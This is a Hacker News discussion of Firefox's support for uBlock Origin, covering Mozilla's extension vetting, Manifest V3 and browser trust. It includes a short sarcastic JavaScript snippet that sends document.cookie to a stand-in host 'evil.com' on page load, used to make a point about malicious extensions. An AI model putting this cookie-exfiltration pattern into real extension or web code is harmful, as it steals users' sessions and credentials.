Top
Best
New

Posted by DemiGuru 14 hours ago

Firefox is now the last major browser that still supports uBlock Origin(www.pcworld.com)
960 points | 365 comments
GeekyBear 10 hours ago|
Firefox is also the only browser that vets uBlock's code on every update to make sure the developer hasn't inserted spyware or malware into the extension.

They don't do it for every extension, but they do so for a wide selection of popular options.

> Recommended extensions differ from other extensions that are regularly reviewed by Firefox staff in that they are curated extensions that meet the highest standards of security, functionality and user experience. After receiving Recommended status, safety standards are maintained through automated checks, monitoring, and periodic technical reviews

https://support.mozilla.org/en-US/kb/recommended-extensions-...

gurjeet 8 hours ago||
Complete, authoritative list of Firefox extensions officially recommended by Mozilla.

https://addons.mozilla.org/en-US/firefox/search/?promoted=re...

Some quite informative discussion on Firefox subreddit when I discovered and posted the above list there a few months ago.

https://www.reddit.com/r/firefox/comments/1pyvx2v/complete_a...

The Recommended Extensions program description: https://support.mozilla.org/en-US/kb/recommended-extensions-...

benatkin 7 hours ago||
I seem to remember TamperMonkey being on there but not ViolentMonkey, which I didn't agree with. However, I see neither of them on there. Both are available but not recommended. I wonder what is going on with that.
culi 5 hours ago||
Probably just resources. Mozilla has to vet each update to give them the "recommended" badge and so they probably focus on the most popular extensions
benatkin 5 hours ago||
They should have vetted ViolentMonkey instead of TamperMonkey the last time around.
big_toast 10 hours ago|||
That's pretty cool. Thanks for pointing that out. I don't see where it says 'on every update' unless you're referring to the automated checks?

I've always wished extensions had more granular permissions though (a la phones, but more so). I think automated ai security checks sound promising soon.

elashri 9 hours ago|||
Automated checks are done for every extension on every update. But their recommend extensions they feature on the Extension store, they do other extensive checks for each update.
socalgal2 7 hours ago|||
what permissions do you suggest?
yjftsjthsd-h 3 hours ago||
I'd like a way to easily specify exactly what sites an extension can run on. There are extensions that I'd like to run on a subset - often just one or two sites - without giving them access do anything else. For that matter, a way to only activate an extension as a one-off when I click it and on no other tabs.
raffraffraff 2 hours ago|||
What about container specific permissions? If they implemented that it would be enough for me since I tend to split up my services by type (eg: shopping, banking, work, hack) so enabling an extensive on a specific set of containers would rock. Right now I think the only control we have is over private tabs/windows?
Paradigm2020 2 hours ago|||
I'm using an extension that does exactly that¹, actually every update of the extension is mostly about then supporting more websites and asking permission to access those.

So maybe more developers could do a all sites and manually select sites option?

¹BPC extension

jstanley 1 hour ago||
The extension can declare which websites it can access, but the other commenter was looking for the ability for the user to declare which websites it can access.
swed420 9 hours ago|||
> Firefox is also the only browser that vets uBlock's code on every update to make sure the developer hasn't inserted spyware or malware into the extension.

They could save themselves the trouble if Firefox simply baked in its own ad-blocking, but since Google basically owns them, we all know that will never happen.

Ladybird browser is going to be awesome.

dralley 9 hours ago|||
Websites already can barely be assed to care about supporting Firefox users, doing adblocking by default is a great way to get websites to start putting up banners that say "our website does not work with your browser, please switch to Chrome" en-masse.

And Mozilla did develop anti-fingerprinting tech, but they can't enable it by default because it breaks lots of websites and when a website doesn't work they're not going to appreciate Mozilla for protecting them, they're going to be pissed that it doesn't work.

somenameforme 2 hours ago|||
Brave has native ad-block and anti finger-printing, enabled by default, and the web works excellently as in I don't know of a single site that doesn't work with it.
moebrowne 25 minutes ago||
Not saying your wrong, but the number, and type, of sites you browse is going to be a very narrow slice of the sites that all Firefox users browse
kazinator 1 hour ago||||
> banners that say "our website does not work with your browser, please switch to Chrome"

Which in practice means "switch to using a Firefox extension which fakes looking like Chrome, and just to selected shitty sites like ours".

HappMacDonald 23 minutes ago||
Which in practice would only be executed by the same crowd of people who would have opted-in to the security features on the first pass.
OtomotO 12 minutes ago||
Which in turn should be built into the browser and done automatically
tomkarho 2 hours ago||||
> start putting up banners that say "our website does not work with your browser, please switch to Chrome"

That's how IE 6 was killed.

pjmlp 1 hour ago||
It was killed by a lawsuit, mostly.

Also FE devs using all new Chrome shinny APIs, and their Electron junk are also to blame, and they aren't going to throw their toys away.

tentacleuno 16 minutes ago||
If nothing else, I really do hope that the greater AI usage leads to more adoption (and hopefully interest) of native frameworks.
pjmlp 7 minutes ago||
If only, everyone brags about Claude and Fable, yet they can't do anything better than Electron and React for TUIs.
Grom_PE 4 hours ago||||
Websites blocking Firefox because of ad blocking has happened before:

https://web.archive.org/web/20070817224229/http://whyfirefox...

cookiengineer 2 hours ago||||
With a normal Firefox on desktop on Linux, I get unsolvable recaptchas all the time, especially on cloudflare pages.

Ironically, if I fake instead a chromium to be on Windows (UA and Sec-CH headers), I am allowed most of the time even though my TCP fingerprint must mismatch then.

It's annoying to see what the normal web has become. Can't even read news anymore.

Ironically, all these bot defenses make it easier for bots to scrape their website, but make it harder for actual users to use them.

The only bot defense web app firewall that still works with Firefox seems to be Anubis. Pretty much all others autoflag Linux users as bot users, which feels insane if you think about less web developers must know about how botnets work.

happymellon 1 hour ago|||
> With a normal Firefox on desktop on Linux, I get unsolvable recaptchas all the time, especially on cloudflare pages.

I get this with Chrome on MacOS.

I'm becoming more convinced that Cloudflare is the bane of the internet.

notpushkin 1 hour ago|||
> I get unsolvable recaptchas all the time, especially on cloudflare pages.

If you really mean reCAPTCHA (the one with a “select all squares that have X” kinda challenges), then Cloudflare hasn’t used that for quite a while now. archive.today uses a Cloudflare-looking (old style) page with a reCAPTCHA (and they do serve it quite often), but I don’t think I’ve seen other sites do that.

swed420 8 hours ago|||
The level of mental gymnastics in this thread denying the extent to which companies like Google (and their puppets like Mozilla) control the internet is too damn high.

Fortunately if projects like Ladybird gain enough momentum, websites might be forced to cater to it. Time will tell.

inigyou 8 hours ago|||
You know you can make a browser based on Firefox's core and don't need to make a new one from scratch that'll never get past Cloudflare?
swed420 8 hours ago||
> You know you can make a browser based on Firefox's core

If you want to inherit all of Firefox's flaws, I suppose.

> and don't need to make a new one from scratch that'll never get past Cloudflare?

Considering Cloudflare is a sponsor of Ladybird, something tells me they're going to grant an exception for it.

chironjit 5 hours ago|||
Sadly Cloudflare's browser detector is the main barrier to using Servo for most websites, so they're not the angel they seem
Larrikin 6 hours ago|||
What flaws exactly?

People on here love to moan about Firefox because Mozilla did one thing at some point in the existence of the company they didn't like. But then just cede the Internet to Google and chromium clones because at some point when they were a crappy junior JS dev, Chrome had some better tooling over Firebug so they just got used to testing in one browser. Maybe they also like to remember how Firefox, a decade ago, couldn't handle 1000 tab sessions.

I hope Firefox keeps up the fight but HN loves to crap all over them for not being perfect.

GoblinSlayer 1 hour ago|||
People complain about Chrome as often as about psychopaths, because it can't be fixed.
tombert 5 hours ago|||
Can’t speak for all users, but at least as of about six months ago, there appears to be a bug in Firefox in NixOS where the shader cache doesn’t appear to be able to write properly, and as such video acceleration doesn’t work. It became most evident when I was trying to watch 360-degree videos in Immich.

Entirely possible that this is an issue specific to NixOS or my machine, but because of that issue I switched over to Brave.

I would like to go back to Firefox at some point. Maybe I’ll see if I can make a patch to fix video acceleration on NixOS.

fouc 4 hours ago|||
the obvious thing to do is keep using firefox as your daily driver, and load up the other browser as needed for the video etc.

I'm being tongue-in-cheek here because it seems most people just give up on safari/firefox if one thing doesn't work and go to some chromium-based browser as their default driver. That's sad.

duskdozer 1 hour ago|||
I don't understand it. I do keep an ungoogled chromium install around for the few times when I suspect a site is intentionally breaking itself for firefox, and it's not a big deal to open on occasion. Otherwise, if you value customization at all, you have to use firefox.
picofarad 2 hours ago||||
What you say is what I do, Firefox is open all the time, I switch to brave or edge if ff won't load something. I use adnauseam as adblocker.

I have never had chrome on windows 10 or 11; nor chromium.

For a year chase.com wouldn't allow me to login from Firefox. Dumb.

inigyou 8 minutes ago||
Did you go to your local Chase branch with Firefox on your phone and pretend you have no idea why it doesn't work?
kakacik 1 hour ago|||
Thats what I do - that 1 page in 100, if at all, goes to chrome. But basically 100% of pages I ever use work fine.

They will have to pry with significant force firefox with ublock origin from my old dusty finger bones... fuck the rest for selling us all out.

Even if it won't move the needle a bit, I can look at myself in the mirror in this specific regard and be content that I didnt bow my head like bland masses did and didnt work towards massive enshittification of our global society from now on.

Because thats what its all about, nothing less. With our choices, we shape future for our kids and grandkids. Shame on you, all you rich faangs who are directly helping this. Godwin's law is never too far in such cases and history wont be kind to you, no reason to be

7bit 1 hour ago|||
Aw man, one issue you don't even know is Firefox's fault?
Plont 8 hours ago|||
They literally didn't deny that. They made a separate point you appear not to have actually read.

Regardless, I don't want baked-in Firefox adblocking in part because I don't trust Mozilla with that task either. They'd absolutely end up allowing their own "acceptable" telemetry and ads. Even if they didn't, it would be unlikely to ever be as effective as Ublock Origin. Much like how Chromium browsers' built-in adblocking is barely anything in comparison, even on Manifest V2.

And yet, for now, Firefox and Mozilla is by far the lesser evil. I like a few of the Chromium browsers well enough, but they are ultimately at the mercy of Google.

I hope Ladybird does well, too.

swed420 7 hours ago||
Their separate point was ignored because it was an irrelevant tangent.

> Regardless, I don't want baked-in Firefox adblocking in part because I don't trust Mozilla with that task either.

This is in a thread about how we should be happy that FF is vetting code for us. Do we trust them or don't we?

> And yet, for now, Firefox and Mozilla is by far the lesser evil.

I'm instinctively tempted to agree, but the difference is so negligible at this point that the only sign I would is the fact I'm still using FF due to momentum (as well as Ladybird not being ready from prime time yet).

FF/Mozilla has proven itself to be controlled opposition, so I'm not very interested in games of "lesser-of-two-evils" abuser logic that has infected politics and many other spheres in a race to the bottom.

aaplok 7 hours ago|||
> Do we trust them or don't we?

GP trusts them for reviewing external extension code, and ensure that it does not contain malware, but not for not inserting exception to their own telemetry if they wrote the code themselves.

Or, more likely, they feel that having two independent actors collaborating on the extension (one by writing and the other by reviewing) yields a more trustworthy outcome than either actor on their own.

swed420 7 hours ago||
That was a rhetorical question.

Mozilla have given us plenty of reasons to not trust them, which makes it hilarious that anybody would think it's noteworthy they're reviewing the code of Raymond Hill of all people.

Dylan16807 3 hours ago||
We could tell it was rhetorical, to imply the position was ridiculous. But when accepting nuance there is a real answer.

> Raymond Hill of all people.

As good as he's been, he's still just one person with a hobby project. Yes please review it!

And what if he gets hacked?

7bit 55 minutes ago|||
>> Regardless, I don't want baked-in Firefox adblocking in part because I don't trust Mozilla with that task either.

> This is in a thread about how we should be happy that FF is vetting code for us. Do we trust them or don't we?

Are you joking? You brought the claim to the table, and now that people see the flaws in it you deny them talking about it? You're some mental gymnast..

WorldMaker 7 hours ago||||
Admiral and several other of the more obnoxious ad networks already claim that Firefox is an ad blocker simply because of its out-of-the-box blocking support for third-party cookies and those ad networks nag you to use another browser. If Firefox added actual ad blocking out of the box I can't imagine the havoc that would cause and how many more websites would claim that they don't work at all in Firefox.
glenstein 3 hours ago||
A sharp point in this context because yet again, Mozilla faces contradictory demands in every direction. In today's edition, they are failing their users by not hard coding the ablocking in but also they need to give up on ad blocking because if they try they'll simply be blacklisted.
Dylan16807 3 hours ago||
"Do X." versus "Don't do X." is a set of demands faced by most programs.
epihelix 8 hours ago||||
That's like suggesting that someone using LLMs to assist coding, could save themselves the trouble by writing the code by hand.

Yes, Firefox could do everything, but then it'd turn back into Mozilla. The whole point of the extensions framework is to allow modular extensibility. And it's much easier to vet for malware than to code afresh and maintain.

What stuns me is that most people still use browsers that cannot block ads, seem genuinely annoyed by ads, but don't want to even try switching to a browser that will easily block those ads. It's amazing how much crap people are willing to wade through when the alternative is trying something new.

swed420 8 hours ago|||
> That's like suggesting that someone using LLMs to assist coding, could save themselves the trouble by writing the code by hand.

No it's not.

> Yes, Firefox could do everything, but then it'd turn back into Mozilla. The whole point of the extensions framework is to allow modular extensibility. And it's much easier to vet for malware than to code afresh and maintain.

No, quite the opposite. FF has a history of adopting extensions as baked-in functionality if they prove useful/popular enough. There are tons of examples of this from the past for various features, which is great.

But that fact makes it even more absurd that they refuse to do the same for what is likely their most popular extension of all time: uBlock Origin

kazinator 1 hour ago||||
Not "everything", just a few common things that almost every user wants.
oblio 5 hours ago|||
> Yes, Firefox could do everything, but then it'd turn back into Mozilla.

It's been 20+ years, nobody cares about that anymore.

firefax 7 hours ago||||
>since Google basically owns them

Google has been trying to kill them since they moved the Chrome team into the same building as the now defunct SF office.

(Apparently they offered people a lot of money? There are some words I could use to describe people who do things they think are unethical for cash I'll leave unsaid.)

3371 4 hours ago||||
People believe ublock because it's reputable and not affiliated with browsers IMO.
stubish 7 hours ago||||
If Firefox baked in ad blocking, they would have to then deal with the financial incentive to make it worse. Sponsored ads, 'good' ads, government announcements, election propaganda... there is a slippery slope they are better off not getting on. A trusted 3rd party from the wider community seems a better option in many ways. The alternative is starting a web browser with a manifesto welded on that essentially states 'death to all advertising', and until that can be crowd funded I can't see that happening in today's world.

What I am surprised about is that none of the browsers or forks have created a specialist plugin API for adblocking and maybe other filtering. Provide what is needed and only that (keeping the surface tiny), and then evolve the general purpose API in the way they need. I don't think we need V2 of the API any more, except for keeping this one absolutely critical plugin working, do we?

cuu508 4 hours ago||||
In one of the monthly update videos Andreas mentioned that although they are working on a basic built-in adblocker for Ladybird, long-term they want extension support and the adblocking functionality to be in an extension.
ryandrake 3 hours ago||
Why does ad blocking always have to be relegated to an extension? Browsers build in so many things. Why do they all draw the line at a feature like ad blocking that every user wants?
happymellon 1 hour ago||
Because they want a level of plausible deniability.
deweywsu 9 hours ago||||
See, this is the kind of thing that makes Firefox cool. They have not only just as good of developer console tools as Chrome, they have forward thinking, truly user-oriented policies. They have had trouble in the recent past at securing funding, but something tells me their user philosophy might save them when all the others turn completely to corporate greed as their main operating mechanism (if they already haven't).
swed420 9 hours ago||
Your reply makes no sense. To the original point, if they had user-oriented policies, they'd have ad-blocking baked in by now. But they don't, and likely never will.
bigbadfeline 7 hours ago|||
> Your reply makes no sense. To the original point, if they had user-oriented policies, they'd have ad-blocking baked in by now.

It's not black and white, and your inability to see the larger context is disturbing.

You could, by the same logic, criticize Mozilla for not serving you coffee which is certainly a "user-oriented policy" "baked-in" or rather "brewed-in". But we must be realistic about how far UOPs can be stretched, Mozilla is better than the rest, which includes large corps with far more money than them. If you can do better than Mozilla, I'm all ears.

Next, an ad-blocker needs continuous maintenance - someone started a good one long time ago and apparently loves to improve it and maintain the various lists it uses - why should Mozilla strain to compete with one of their best contributors? - that would be both rude and dumb, and they'd be wasting resources too. There's absolutely no upside to your proposition but you keep insisting.

swed420 7 hours ago||
> Next, an ad-blocker needs continuous maintenance - someone started a good one long time ago and apparently loves to improve it and maintain the various lists it uses - why should Mozilla strain to compete with one of their best contributors? - that would be both rude and dumb, and they'd be wasting resources too. There's absolutely no upside to your proposition but you keep insisting.

One would hope that's one of the more useful things an LLM could assist with if not now, very soon. In the meantime, there's no reason they couldn't have uBlock kept as an extension but bundled by default like they've done with other functionality over the years. Wait, never mind. There's one rea$on why they wouldn't, and it's already been $tated.

ruckcbek 9 hours ago|||
You're absolutely right.
KingMob 4 hours ago||||
[flagged]
lukan 1 hour ago|||
"RIP Charlie Kirk

I hope many more debate nerds carry on his quest to engage young people with words, not fists."

If this statement - a urge to engage in peaceful debate, not violence - makes you hate him, then I see the problem rather with you. I mean seriously, do you like civil war? Because this is what happens when people don't talk anymore about their disagreements, but physically fight.

latexr 59 minutes ago||
https://www.youtube.com/watch?v=AkKo1_RP_0c
lukan 45 minutes ago||
Mildly funny, but not sure what your point is here?
binarin 1 hour ago||||
I didn't know who Charlie Kirk was, and no facts about DHH other than him being Rails creator.

"will never be awesome" is missing some quantifier about US-centricity.

latexr 1 hour ago||
> US-centricity

Andreas Kling is Swedish, DHH is Danish, fascism originated in Europe.

wizzwizz4 11 minutes ago||
Italian fascism originated in Italy, but if you broaden the definition of "fascism" to include Nazism (as Adolf Hitler did), then there's an argument that it originated in the 19th century, in many parts of the world, including the United States. Among others, Adolf Hitler took inspiration from Madison Grant, Henry Ford, and the Jim Crow laws; and the Nazi regime took inspiration from Harry Laughlin, the KKK, and American eugenics. (WWII might be a bigger contributor to eugenics going out of fashion in the US than its lack of scientific merit was.)
glenstein 3 hours ago||||
Yikes, that is a twist I was not aware of.
akimbostrawman 2 hours ago|||
I don't see how someones personal politics could dictate the "awesomeness" of there software.

Considering enough developer on this very site "stan" Charlie Kirks assassin and other people that are violent towards anybody less left wing than them: "your boos mean nothing, i have seen for what you cheer"

ako 17 minutes ago||
Exactly, the German autobahn is also awesome. /s
cyberrock 6 hours ago|||
After watching them butcher their own side tabs implementation, I don't know if we really want that, unless they're actually hiring the uBO team directly.
Beijinger 5 hours ago|||
Also for youtube download plug-ins. yt-dpl does not work for youtube anymore.
culi 5 hours ago||
Still works for me. The occasional 403 has always been an issue
Beijinger 5 hours ago|||
I recommend two more:

1. pass paywalls clean.

2. Social Fixer

armadyl 4 hours ago|||
Rather than introducing additional attack surface and privacy risks with yet another extension you can just use archive.is/archive.ph instead of Bypass Paywalls Clean.

Or, just pay for journalism since it’s not free to do.

culi 5 hours ago|||
You mean Bypass Paywalls Clean? It's illegal and it's not even on the Firefox extension store. You have to download it from some Russian Github alternative and manually install it.

I will say however, it works remarkably well. I haven't seen a paywall in years!

Beijinger 5 hours ago||
Why should it be illegal?
culi 3 hours ago|||
I don't think it should but it was taken down from Firefox's store because of a DMCA copyright takedown. Firefox was required by law to remove it. Using the extension itself is a legal grey area, but distributing it is usually illegal.
WD-42 46 minutes ago||||
It’s not illegal. But it’s a step too far for some.
_ZeD_ 4 hours ago|||
It's not. Op is wrong
culi 3 hours ago||
It's been taken down by DMCA copyright strikes on every western platform that could distribute it. That's why you can't find it on the Firefox extension store anymore
einpoklum 9 hours ago||
> Firefox is also the only browser that vets uBlock's code on every update to make sure the developer hasn't inserted spyware or malware into the extension.

Why, are they worried it might interfere with the spyware they bake into Firefox themselves?

https://www.howtogeek.com/557929/how-to-see-and-disable-the-...

culi 5 hours ago||
I don't like telemetry being defaulted to opt-in but relax. It's anonymized and it's far and away the least intrusive of the major browsers
einpoklum 1 hour ago||
It's not anonymized, because your communication with Mozilla has plenty of identifying information.

Also, Mozilla officially un-committed to not using sell this and any other data it collects from you:

https://arstechnica.com/tech-policy/2025/02/firefox-deletes-...

moebrowne 16 minutes ago||
That article is well over a year old. The current privacy FAQ right now explicitly states:

> We never sell your personal data. Unlike other big tech companies that collect and profit off your personal information, we’re built with privacy as the default. We don’t know your age, gender, precise location, or other information Big Tech collects and profits from.

https://www.mozilla.org/en-US/privacy/faq/

avaer 10 hours ago||
What's funny is that extensions were supposed to be a way to let you do the things the browser didn't want you to do. Guess that was a bit too much freedom for Google to accept, so they had to make a store with a gate, and destroy the APIs so that they're useless. Then they had to make up some reasons to justify that and ram it through the pipeline despite everyone's objections, and the frog got boiled.

Now we're back to needing an actual extension system that does what extensions were supposed to do in the first place.

matheusmoreira 10 hours ago||
> Then they had to make up some reasons to justify that

Hate to be the one to defend Google here, but the reasons weren't that unreasonable. I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

It's just that uBlock Origin is so insanely useful, important and trusted, it should get full access to the entire browser regardless. Honestly, it should be literally built into the browser instead of being a mere extension. Only the conflicts of interest inherent in an ad company maintaining an ad blocker prevent that.

codedokode 10 hours ago|||
Yes, but if you write your own extension maybe you want to read and modify the data. For example, patch fingerprinting script so that it gets the wrong result.

Furthermore, malicious extension can read the data from the DOM, from forms (for example, password or credit card fields), and in some cases, from JS variables. They can insert fake information into the page. So preventing extensions from reading network data still leaves a lot of options for a malicious extension.

jimmydorry 6 hours ago||
So you're saying that because Google didn't completely up-end the security model and break almost every extension in the one-go, we should have no-progress towards a more secure extension model?

uBlock Origin via declarative blocks is almost as powerful as the original. While I would trust gorhill with almost unfettered control over my browser, I don't trust EVERY extension owner (no do I trust uBlock Origin in perpetuity).

glenstein 3 hours ago||
>So you're saying that because Google didn't completely up-end the security model and break almost every extension in the one-go, we should have no-progress towards a more secure extension model?

A funny argument to make because the thing that would make such a measure ridiculous as you rightly point out, is exactly what already makes the Manifest changes ridiculous in the first instance. They were making a rhetorical point and you elaborated on their point for them as if doing so expressed a disagreement.

jimmydorry 2 hours ago||
I think a big step forward, towards a better security model, was overall a good thing, even if it meant that a good extension no longer had unfettered access to everything your browser saw. I don't think this change is ridiculous at all. And I don't want them to stop here either! v4 should close more of the avenues that malicious extensions are abusing! Extensions should declare everything up-front, so it's easy see if abuse is occuring.
simonra 13 minutes ago||
How do you secure against the system vendor (in this case the browser) limiting what the consumer/user can or can't do (alone or with the help of third parties) with the product after acquiring it though? After all security for individuals against commercial and otherwise organized interests is one of the, if not the most important security after life and health. Even if one values the market overall for financial reasons, there is a solid argument that preventing modifications (and thus also repairs) is anti-competitive. It would be damaging to society if manifestV4 is realized restricting what can run further, much like printers and operating systems where the users ability to run software they bring themselves is limited has been. Just as no one should have to go to a mechanic with a special deal with the manufacturer to get their car or tractor to work as desired, neither should users of software.
michaelt 9 hours ago||||
> I want my browser to prevent random extensions from directly reading web page data.

To be honest, to me it sounds like you don't want browser extensions then.

To me, directly messing with web page data and browser behaviour is the whole point of a browser extension - what else is a browser extension for?

matheusmoreira 8 hours ago|||
The purpose of browser extensions is to build up an install base then sell out to some corporation that then promptly leverages that user base to exfiltrate data and monetize it.

No thanks. They should have to declare to the browser what it is they want done instead.

tmgldn 8 hours ago|||
This point would be far more credible if browsers weren't in business to do what you claimed extensions are there to do.

I'd also argue that creating a full browser without a profit motive is more unrealistic than creating an extension and uploading it - for free - to a web store.

glenstein 3 hours ago||
Right, basically no web browser has a profitable business model except through licensing or being subsidized through some other branch of the business.

The best pure browser company in history was Opera, and they didn't fail because they weren't innovating. It is simply not a survivable model. People don't remember anything, but during Google's recent anti trust case, one floated "solution" was to spin Chrome off as a separate company, but that was regarded as unrealistic partly because such a company would not have a credible path to profitability separate from Google.

I happen to disagree, they could have collected a search licensing fee just like Firefox but that model is already being regarded as monopoly adjacent.

static_motion 5 hours ago||||
And extensions do exactly that in Firefox. When installing (or updating) extensions you're notified of any and all permissions the extension is requesting from the browser and you're given the choice to proceed with the installation or not. Google goes a step further and just straight up denies user choice entirely.
a2ff6eeb0 6 hours ago||||
I think you're confusing the extension and the browser. The browsers are generally in the business of supporting an advertising company.
jamesnorden 8 hours ago||||
It still sounds like you don't want browser extensions then.
7bit 46 minutes ago||||
Bro, they have to declare there Firefox's policy. What the heck are you doing? Hallucinating claim after claim to support your weak defense. Just stop
matheusmoreira 9 minutes ago||
"Declare" means the extension tells the browser what they want to filter and then the browser does it internally without ever allowing the extension to read and write private information.

The argument has nothing at all to do with declaring permissions in a manifest.

inigyou 8 hours ago|||
... But they do that. The declaration is written in a language called JavaScript.
matheusmoreira 4 hours ago||
Javascript is not a declarative language.
inigyou 10 minutes ago||
Sure it is.

Here's how you can write a declaration that you want to exfiltrate cookies:

    document.addEventListener("load", function(){
        fetch("http://evil.com/"+document.cookie);
    });
lxgr 9 hours ago|||
Why should there not be a middle ground between “can do absolutely everything with all my data” and “is basically a glorified bookmark button” based on the level of trust I have for an extension?
mzajc 7 hours ago|||
Because security is the pretext, not the goal here. I'm sure browsers could have better security controls for extensions, but giving users extra control over software doesn't seem to be very popular among corpos nowadays.
inigyou 8 hours ago|||
Because the browser already has bookmark buttons
aucisson_masque 1 hour ago||||
> Hate to be the one to defend Google here, but the reasons weren't that unreasonable. I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

Don't kid yourself, even with mv3 if you install a rogue extension it's going to have access to a lot more data than you would be comfortable sharing to.

matheusmoreira 6 minutes ago||
Yes, which is why it is important to lock such things down.
drtgh 8 hours ago||||
>Hate to be the one to defend Google here, but the reasons weren't that unreasonable.

Sounds like some kind of Stockholm syndrome. Years ago, it was standard practice for software to be designed so that users could grant permissions to access invasive methods or functions.

Google relies on users' personal data (ads), which is why they introduced a unique ID to their Chrome browser (to track).

edoceo 8 hours ago||
When was that standard practice? Cause years ago (like 2000) I remember even trivial and simple software (WeatherBug) being able to read/write all over the computer (Windows). And some crap I just installed on Win11 can see all over the box, just slightly less.
flomo 5 hours ago||||
> I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

Agreed. And you would think most paranoid HN types would too.

> It's just that uBlock Origin is so insanely useful, important and trusted

Maybe I'm foggy on the history. But isn't this like Fork #4 or #5 of some previous AdBlock extension?

Seems like the only business model for this type of extension is "selling out" for certain ads. And then the cycle repeats and forum posters tell you to install qBlock Omega or whatever. Maybe Mozilla doesn't want to get in the middle of this?

bo1024 10 hours ago||||
Of course it's tempting to reply "don't install random extensions". But a bigger point here is that browsers have grown so massively complex that it's almost impossible to build one, so we don't have an ecosystem where you can choose your browser for safety and I can choose mine for freedom. Of course, Google has had a big incentive and hand in making it this way.
radley 9 hours ago||||
> I want my browser to prevent random extensions...

Why are you installing random extensions?

lxgr 9 hours ago|||
Not GP, but sometimes I want my browser to do pretty random/niche things without that compromising all of my browsing data.
SoftTalker 3 hours ago|||
Create a new profile, do the niche thing there, separately from the rest of your browsing.
inigyou 8 hours ago|||
How can the browser tell the difference between a random thing you want and a random thing you don't want?
matheusmoreira 9 hours ago|||
I'm not. The only extension I trust enough to install is uBlock Origin.
FeepingCreature 4 hours ago||
Well great! You are already protected from random extensions then.
matheusmoreira 3 hours ago||
Yeah, by opting out of them altogether. I'd very much enjoy having useful extensions that are not dangerous instead.
aucisson_masque 1 hour ago||
You can't trust a code that you didn't audit before. End of story.

What you are asking for is simply impossible, even without any permissions rogue extensions can still do a lot. It's what some developers spend their entire time working on.

If Google couldn't fix it with Android, which has granular permission per applications, why do you think it's going to be even remotely effective on the web browser ?

yjftsjthsd-h 3 hours ago||||
> I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

I was under the impression that manifest v3 still allowed extensions to read anything, just not modify. Is that not the case? (Random link because this is hard to search for: https://news.ycombinator.com/item?id=38303446 )

matheusmoreira 5 minutes ago||
Yeah, if that's true then there's no point to Manifest V3... That completely invalidates any security argument.
latexr 36 minutes ago||||
The amount of replies this has gotten regarding the use of “random” is a fine example of the garbage state of discussion on HN and the internet in general.

Clearly “random” was used as a means of saying “any”, to describe extensions the author hasn’t thought of. That will be obvious to anyone arguing in good faith and steel manning the argument.

xtracto 8 hours ago||||
> I want my browser to prevent random extensions from directly reading web page data

This is so funny to me. Coming from a Netscape Navigator world, when extensions first came out, they were supposed to allow the user to add functionality to websites.

Why would someone install "random extensions" that they dont trust. And also, what would extensions do if not read and write data to websites? .

Sign of the times I guess.

duskdozer 14 minutes ago|||
Extensions are set to auto update by default, and it's not obvious at first how to disable that. It's also disallowed to install an extension you've built from source on most release builds, without messing with a hex editor. So essentially, any extension you install is liable to be come a "random" extension, if for example, the author sells out, or something like the attacks on NPM were to happen.
matheusmoreira 4 hours ago||||
> Why would someone install "random extensions" that they dont trust.

Same reason why people download random stuff and run it with administrator permissions on Windows.

latexr 43 minutes ago|||
> Why would someone install "random extensions" that they dont trust.

An extension that you trust today can be sold to an unscrupulous third-party tomorrow. That has happened many many times and will continue to.

7bit 51 minutes ago||||
No worries. Reading the rest of your comments shows, that your defense is paper thin .
tpm 1 hour ago||||
Then don't install them. I want my extensions in my browser on my computer to do whatever I allow them to do and not what's allowed by Google.
ajb 6 hours ago||||
... the greatest danger to us is masterless men; lacking a coercive power to tie their hands, they would destroy society. How else but by binding to lord and master can they be held to the laws? So thought men during feudal times.

In fact, it is possible for people to be held to good conduct without being bound into a single hierarchy, and it should be possible for software to be held to good conduct without giving such power to single monopolists. But it's not in Google's interests to build such mechanisms, any more than it was in the interests of the feudal overlords to look for alternatives to their rule.

matheusmoreira 4 hours ago||
I'm supposed to be the master, actually. It's my computer, any foreign code is essentially a subject in my digital domain. It should be literally impossible for them to do something I don't want them to do. As the god of my little digital realm, I should have maximum power and freedom, while foreign developers get the absolute minimum amount of power that works, and in the ideal case this minimum is zero.

The fact someone gave developers a turing complete language inside the browser where random code is automatically downloaded and executed is a major reason why we even have uBlock Origin in the first place. The vast majority of developers heavily abuse this privilege and cannot be trusted, and that is why we block them with extreme prejudice.

ryandrake 3 hours ago||
This is the way. The owner of the computer should be the ultimate authority over what gets run and not run on that computer. Not Microsoft. Not Apple. Not Google. Not Mozilla. Not some web site developer.
behringer 5 hours ago||||
Of course the reasons weren't unreasonable, that's what made them great excuses for specifically blocking ublock origin.
matheusmoreira 4 hours ago||
They don't specifically block uBlock Origin though. I have no doubt they intended it to, and that's literally my only objection to Manifest V3: it's good but it hurts uBlock Origin therefore I don't accept it.

The right thing is to simply bypass all of that. The fact is uBlock Origin should be literallly built into the browser like the good old popup blockers once were.

If only we had a browser that was independent of ad money.

FeepingCreature 4 hours ago||||
"Random" is a funny thing to call an extension that you have deliberately installed.

I also don't want "random" programs accessing my home folder. That would be terrible! Who knows what programs that could be! I do however want the very specific programs that I have intentionally installed to be able to access my home folder easily. Same for extensions.

The goal here isn't really to protect me from extensions. Extensions don't do anything on their own, they just sit there and wait for me to install them. So the goal is apparently to protect me from me (installing an extension), which really is to say protect their business (ads) from me (blocking them).

matheusmoreira 3 hours ago||
"Random" is what I call pretty much every extension that is not uBlock Origin. I absolutely want them limited to the fullest extent. Maybe if they were, I would actually install some of them.

> I do however want the very specific programs that I have intentionally installed to be able to access my home folder easily.

I don't. My standard operating practice is to virtualize them.

My security posture is considerably more lax towards free and open source software, for obvious reasons, and even then this trust only extends to the software in my Linux distribution's repositories. Stuff coming from PyPI, npm, cargo, ruby gems, and other such "developer centric" repositories get the full virtualization treatment. If it's easy for randoms to publish packages, then it's equally easy for malware to make it in.

sersi 2 hours ago||
What do you use for virtualization for tools from developer repositories? Run them in a VM or sandboxing like bubblewrap?
matheusmoreira 1 hour ago||
QEMU virtual machines. Sandboxes like firejail and bubblewrap share a kernel: attacker is one exploit away from root. Hypervisors present an infinitely smaller attack surface, and if they're ever defeated the entire industry is done, not just me.

I have a base system image that gets forked off into delta qcow2 images for every project I'm working on or whatever ephemeral execution context I need.

I started a side project to build software just to manage those VMs. I'm daily driving this thing even though it's my first "vibecoded" project, it's just way too useful and has saved me quite a few times from accidents.

https://github.com/matheusmoreira/virtdev

